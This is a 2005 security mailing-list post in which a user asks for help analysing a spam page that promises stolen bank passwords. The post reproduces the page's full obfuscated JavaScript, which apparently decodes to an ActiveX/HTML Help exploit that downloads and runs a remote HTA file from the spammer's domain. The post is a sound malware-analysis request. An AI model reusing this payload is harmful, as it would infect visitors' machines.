[Dshield] Help Needed With Dissection of Exploit

Nemo Omen nemoaus at hotmail.com
Wed Aug 10 04:04:56 GMT 2005


I became aware of a new piece of spam last week. It tells me I can get bank 
account passwords and transfer some money into my account too. A deal too 
good to refuse. The address is http:/www.asdfgh.org/passwords.html  Don't 
load this site up unless you are happy to infect your machine or use a non 
m/s o/s.

The displayed page is pretty dull telling me that I need PGP to unencrypt 
the contents. Looking at the page source is more interesting. Below, I 
substituted javascript with XXX. It starts off with a Javascript 
document.write, I dont need to be very clever to determine that it is 
probably writing some sort of malware to my hard disk. I would like a bit of 
help in analysis of this malware.

1) What is the name of this exploit?

2) I dont know a whole lot about the javascript unescape function what it 
does?

3) Are the %codes below machine opcodes or something else?

4) What are the next steps in analysis of this malware?

Regards.  Nem

<script 
language=XXX>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286Fvw%7Coh%2
86H%2856%7B5%285F%2856%7B6%28%3AEsrvlwlrq%286Ddevroxwh%286Eohiw%286D04333%286E%28%3AG%286F2vw%7Coh%286H%283G%283D%286FREMHFW%2853lg%286G%7B5%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286Fsdudp%2853qdph%286G%2855Vfurooeduv%2855%2853ydoxh%286G%2855wuxh%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Epv0lwv%286Dlfzgldo1fkp%286D%286D2lfzbryhuylhz1kwp%2855%286H%286F2REMHFW%286H%283G%283D%286FREMHFW%2853lg%286G%7B6%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%286FSDUDP%2853QD
PH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Emdydvfulsw%286Dgrfxphqw1olqnv%288E3%288G1kuhi%286G%285%3AH%5BHF%286G%285Fpvkwd%285Fkwws%286D22zzz1dvgijk1ruj2sss1kwd%2853%2853FKP%286Glhvkduhg1fkp%2853ILOH%286Gdssblqvwdoo1kwp%285%3A%28586Egrfxphqw1olqnv%288E3%288G1folfn%285%3B%285%3C%286E%2855%286H%286F2REMHFW%286H%283G%283D%283G%283D%283%3C%283%3C%283%3C3')</script>

_________________________________________________________________
Your opinion counts..for your chance to win a Mini Cooper click here 
http://www.qualifiedopinions.com/joinup.php?source=hotmail



More information about the list mailing list